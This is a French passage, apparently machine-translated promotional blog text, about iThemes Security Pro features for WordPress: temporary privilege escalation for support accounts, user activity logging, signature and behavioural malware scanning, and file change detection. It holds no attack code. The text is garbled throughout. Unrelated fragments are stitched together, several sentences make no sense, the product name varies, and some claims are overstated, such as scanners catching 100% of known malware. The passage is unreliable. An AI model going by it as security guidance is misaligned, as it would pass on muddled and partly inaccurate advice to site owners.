que vous créez un nouvel utilisateur, créez un utilisateur de soutien général et ajoutez un autre point d’entrée disponible pour les pirates informatiques. Cependant, parfois, votre site Web peut avoir besoin d’aide extérieure, par exemple après avoir demandé du soutien ou engagé un entrepreneur indépendant. Vous avez besoin d’un moyen sûr d’ajouter un accès administratif temporaire à votre site Web. Par exemple, supposons qu’il y ait un problème avec un plug – in installé sur votre site Web. Après avoir communiqué avec le personnel de soutien, il doit accéder à votre site Web en tant qu’administrateur afin qu’il puisse le consulter attentivement. Cela semble être une demande très raisonnable et vous avez décidé de leur accorder l’accès. Alors… Vous permet de supprimer un utilisateur lorsqu’il n’a plus besoin d’accéder à votre site. La meilleure pratique pour WordPress Security est de supprimer tous les utilisateurs inutilisés de votre site. Qu’est – ce qu’une mise à jour des permissions? La fonctionnalité d’amélioration des privilèges d’ithemes Security pro vous permet d’accorder temporairement des fonctionnalités supplémentaires aux utilisateurs. La mise à jour des permissions facilite et sécurise la création d’utilisateurs génériques que vous pouvez mettre à la disposition de tout développeur externe ou technicien de soutien qui a besoin d’un accès temporaire à votre site Web. La mise à jour des permissions vous permet de créer un nouvel utilisateur, de l’appeler support et de l’assigner au rôle d’utilisateur de l’abonné. La prochaine fois que vous aurez besoin d’un accès temporaire au site, vous pouvez déplacer les utilisateurs de soutien de l’abonné à l’Administrateur. Nous verrons comment le faire dans les prochains messages, Mais commençons par expliquer pourquoi l’amélioration des permissions est un meilleur moyen d’accorder l’accès à votre site. Pourquoi les permissions de mise à niveau sont – elles meilleures? Simple: vous n’avez pas à créer un nouvel utilisateur chaque fois que vous accordez l’accès au site. Automatique: l’augmentation des permissions ne dure que 24 heures. Après 24 heures, l’utilisateur perd automatiquement toutes les autres permissions. Vous n’avez pas besoin de vous souvenir de supprimer un utilisateur ou de changer un mot de passe. Sans sacrifier la sécurité: Vous pouvez toujours demander à cet utilisateur de support universel de vous connecter en utilisant la méthode de courriel à deux facteurs, ce qui signifie que vous avez le même niveau de sécurité que les autres utilisateurs administratifs. Étant donné que le rôle réel de l’utilisateur est celui d’un abonné, il n’y a aucun risque réel de le laisser sur le site. Comment utiliser la mise à jour des permissions dans themes Security pro pour commencer, activez la mise à jour des permissions sur la page principale des paramètres de sécurité. |
Le premier type d’activité d’utilisateur enregistré est l’heure et le lieu où l’utilisateur se connecte et se déconnecte de votre site Web. Le suivi de l’heure et de l’emplacement de l’accès de l’utilisateur peut vous aider à identifier les utilisateurs endommagés. L’utilisateur se connecte – t – il à des heures anormales ou à partir d’un nouvel emplacement? Si c’est le cas, vous voudrez peut – être commencer à enquêter sur eux. 2. Création \ inscription de l’utilisateur | Prochaine activité pour le cuivre Vous devriez l’exécuter parce qu’un tel balayage est généralement le moins précis. Détection de signature et de comportement détection de logiciels malveillants la plupart des logiciels malveillants Scan et antivirus utilisent des signatures de logiciels malveillants pour détecter les logiciels malveillants. La numérisation de logiciels malveillants à la fine pointe de la technologie combinera la détection de signature et l’analyse comportementale. | Signature du logiciel malveillant une signature du logiciel malveillant est une série d’octets utilisés pour identifier un fragment de logiciel malveillant connu. Certains scanners de logiciels malveillants sont pilotés par une base de données contenant des signatures de logiciels malveillants de millions de virus connus. La numérisation des logiciels malveillants basée sur les signatures est rapide et simple et détectera 100% des logiciels malveillants connus et bien connus. Tout cela est génial pour capturer les logiciels malveillants ajoutés par les hackers de bas niveau. Cependant, les hackers expérimentés savent que le scanner de logiciels malveillants vérifie les signatures de logiciels malveillants connus. Ces hackers ont la capacité de brouiller les signatures des logiciels malveillants afin qu’ils ne puissent pas être détectés par un scanner normal. La vitesse de publication des nouveaux logiciels malveillants empêche le scanner de logiciels malveillants de tenir sa base de données à jour avec toutes les signatures les plus récentes. Par conséquent, les scanners basés sur la signature ne seront pas en mesure de distinguer les nouveaux logiciels malveillants des fichiers README. Txt du plug – in. Analyse du comportement l’analyse du comportement surveille le fonctionnement du logiciel pour déterminer s’il est nuisible. De nombreux types de comportement peuvent être considérés comme suspects ou nuisibles. Par exemple, l’API de navigation sécurisée de Google est utilisée pour protéger les sites Web de la numérisation du site themes Security pro. Google Security browse vérifie si le logiciel redirige le trafic vers des sites Web malveillants connus. De même, il n’existe aucun moyen fiable de détecter les logiciels malveillants. Mais la combinaison du contrôle du comportement et de la signature augmentera considérablement vos chances d’être averti L’inquiétude. Ithemes Security pro ne crée pas de notification d’édition de fichier pour les changements qu’il peut vérifier. Mise à jour du plug – in \ thème par le gestionnaire de version la fonctionnalité du gestionnaire de version dans themes Security pro vous permet de mettre à jour automatiquement WordPress, les plug – ins et les thèmes. | Si le gestionnaire de version termine la mise à jour, Themes Security pro connaît la source de la mise à jour et ne déclenche pas d’alerte. 2. Comparaison de fichiers entre le plug – in Themes et le thème sélectionnez la case à cocher « comparaison de fichiers en ligne » dans les paramètres de détection des changements de fichiers pour activer la comparaison de fichiers en ligne. |